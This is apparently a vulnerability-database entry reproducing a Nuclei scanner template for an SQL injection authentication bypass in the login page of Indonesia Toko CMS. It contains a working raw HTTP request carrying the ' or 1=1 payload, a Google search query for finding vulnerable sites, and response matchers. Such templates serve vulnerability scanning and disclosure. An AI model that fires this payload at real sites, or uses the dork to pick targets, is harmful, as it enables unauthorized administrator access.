漏洞描述
Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code.
indonasia-toko-cms-sql: Indonasia Toko CMS - SQL Injection
PoC代码[已公开]
id: indonasia-toko-cms-sql
info:
name: Indonasia Toko CMS - SQL Injection
author: r3Y3r53
severity: high
description: |
Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code.
reference:
- https://cxsecurity.com/issue/WLB-2019030008
metadata:
verified: true
max-request: 1
google-query: inurl:"index.php?mnu=login"
tags: sqli,toko,cms,vuln
http:
- raw:
- |
POST /index.php?mnu=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login
matchers-condition: and
matchers:
- type: word
part: body
words:
- "alert('Administrator"
- type: status
status:
- 200
# digest: 4a0a00473045022100e8693990da94db72d4424e490aa871359e2a98f45473d1f793544956ee3b7e6a02203e7cbe9c73a538ec436b001754fb71184618a10c3bcf307e76134cdfc41f8f8f:922c64590222798bb761d5b6d8e72950